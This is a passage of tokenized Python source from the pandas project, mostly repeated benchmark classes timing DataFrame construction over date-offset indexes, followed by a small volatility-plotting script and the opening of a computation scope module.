time_frame_ctor_dtindex_Minutex2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_MonthBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( MonthBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_MonthBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_MonthBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( MonthBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_MonthBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_MonthEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( MonthEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_MonthEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_MonthEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( MonthEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_MonthEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Nanox1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Nano ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Nanox1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Nanox2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Nano ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Nanox2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_QuarterBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( QuarterBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_QuarterBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_QuarterBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( QuarterBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_QuarterBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_QuarterEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( QuarterEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_QuarterEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_QuarterEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( QuarterEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_QuarterEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Secondx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Second ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Secondx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Secondx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Second ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Secondx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_WeekOfMonthx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( WeekOfMonth ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_WeekOfMonthx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_WeekOfMonthx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( WeekOfMonth ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_WeekOfMonthx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Weekx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Week ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Weekx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Weekx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Week ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Weekx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_YearBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( YearBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_YearBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_YearBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( YearBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_YearBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_YearEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( YearEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_YearEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_YearEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( YearEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_YearEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_list_of_dict ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> ( N , K ) = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> self . index = tm . makeStringIndex ( N ) <EOL> self . columns = tm . makeStringIndex ( K ) <EOL> self . frame = DataFrame ( np . random . randn ( N , K ) , index = self . index , columns = self . columns ) <EOL> try : <EOL> self . data = self . frame . to_dict ( ) <EOL> except : <EOL> self . data = self . frame . toDict ( ) <EOL> self . some_dict = self . data . values ( ) [ <NUM_LIT:0> ] <EOL> self . dict_list = [ dict ( zip ( self . columns , row ) ) for row in self . frame . values ] <EOL> def time_frame_ctor_list_of_dict ( self ) : <EOL> DataFrame ( self . dict_list ) <EOL> class frame_ctor_nested_dict ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> ( N , K ) = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> self . index = tm . makeStringIndex ( N ) <EOL> self . columns = tm . makeStringIndex ( K ) <EOL> self . frame = DataFrame ( np . random . randn ( N , K ) , index = self . index , columns = self . columns ) <EOL> try : <EOL> self . data = self . frame . to_dict ( ) <EOL> except : <EOL> self . data = self . frame . toDict ( ) <EOL> self . some_dict = self . data . values ( ) [ <NUM_LIT:0> ] <EOL> self . dict_list = [ dict ( zip ( self . columns , row ) ) for row in self . frame . values ] <EOL> def time_frame_ctor_nested_dict ( self ) : <EOL> DataFrame ( self . data ) <EOL> class frame_ctor_nested_dict_int64 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . data = dict ( ( ( i , dict ( ( ( j , float ( j ) ) for j in range ( <NUM_LIT:100> ) ) ) ) for i in xrange ( <NUM_LIT> ) ) ) <EOL> def time_frame_ctor_nested_dict_int64 ( self ) : <EOL> DataFrame ( self . data ) <EOL> class frame_from_series ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . mi = MultiIndex . from_tuples ( [ ( x , y ) for x in range ( <NUM_LIT:100> ) for y in range ( <NUM_LIT:100> ) ] ) <EOL> self . s = Series ( randn ( <NUM_LIT> ) , index = self . mi ) <EOL> def time_frame_from_series ( self ) : <EOL> DataFrame ( self . s ) <EOL> class frame_get_numeric_data ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . df = DataFrame ( randn ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . df [ '<STR_LIT:foo>' ] = '<STR_LIT:bar>' <EOL> self . df [ '<STR_LIT:bar>' ] = '<STR_LIT>' <EOL> self . df = self . df . consolidate ( ) <EOL> def time_frame_get_numeric_data ( self ) : <EOL> self . df . _get_numeric_data ( ) <EOL> class series_ctor_from_dict ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> ( N , K ) = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> self . index = tm . makeStringIndex ( N ) <EOL> self . columns = tm . makeStringIndex ( K ) <EOL> self . frame = DataFrame ( np . random . randn ( N , K ) , index = self . index , columns = self . columns ) <EOL> try : <EOL> self . data = self . frame . to_dict ( ) <EOL> except : <EOL> self . data = self . frame . toDict ( ) <EOL> self . some_dict = self . data . values ( ) [ <NUM_LIT:0> ] <EOL> self . dict_list = [ dict ( zip ( self . columns , row ) ) for row in self . frame . values ] <EOL> def time_series_ctor_from_dict ( self ) : <EOL> Series ( self . some_dict ) </s>
<s> import matplotlib . pyplot as plt <EOL> import pandas . util . testing as t <EOL> import pandas . stats . moments as m <EOL> t . N = <NUM_LIT> <EOL> ts = t . makeTimeSeries ( ) <EOL> ts [ : : <NUM_LIT:100> ] = <NUM_LIT:20> <EOL> s = ts . cumsum ( ) <EOL> plt . figure ( figsize = ( <NUM_LIT:10> , <NUM_LIT:5> ) ) <EOL> plt . plot ( s . index , m . ewmvol ( s , span = <NUM_LIT:50> , min_periods = <NUM_LIT:1> ) . values , color = '<STR_LIT:b>' ) <EOL> plt . plot ( s . index , m . rolling_std ( s , <NUM_LIT:50> , min_periods = <NUM_LIT:1> ) . values , color = '<STR_LIT:r>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . legend ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> f = plt . gcf ( ) <EOL> f . autofmt_xdate ( ) <EOL> plt . show ( ) <EOL> plt . close ( '<STR_LIT:all>' ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import struct <EOL> import inspect <EOL> import datetime <EOL> import itertools <EOL> import pprint <EOL> import numpy as np <EOL> import pandas as pd <EOL> from pandas . compat import DeepChainMap , map , StringIO <EOL> from pandas . core . base import StringMixin <EOL> import pandas . computation as compu <EOL> def _ensure_scope ( level , global_dict = None , local_dict = None , resolvers = ( ) , <EOL> target = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return Scope ( level + <NUM_LIT:1> , global_dict = global_dict , local_dict = local_dict , <EOL> resolvers = resolvers , target = target ) <EOL> def _replacer ( x ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> hexin = ord ( x ) <EOL> except TypeError : <EOL> hexin = x <EOL> return hex ( hexin ) <EOL> def _raw_hex_id ( obj ) : <EOL> """<STR_LIT>""" <EOL> packed = struct . pack ( '<STR_LIT>' , id ( obj ) ) <EOL> return '<STR_LIT>' . join ( map ( _replacer , packed ) ) <EOL> _DEFAULT_GLOBALS = { <EOL> '<STR_LIT>' : pd . lib . Timestamp , <EOL> 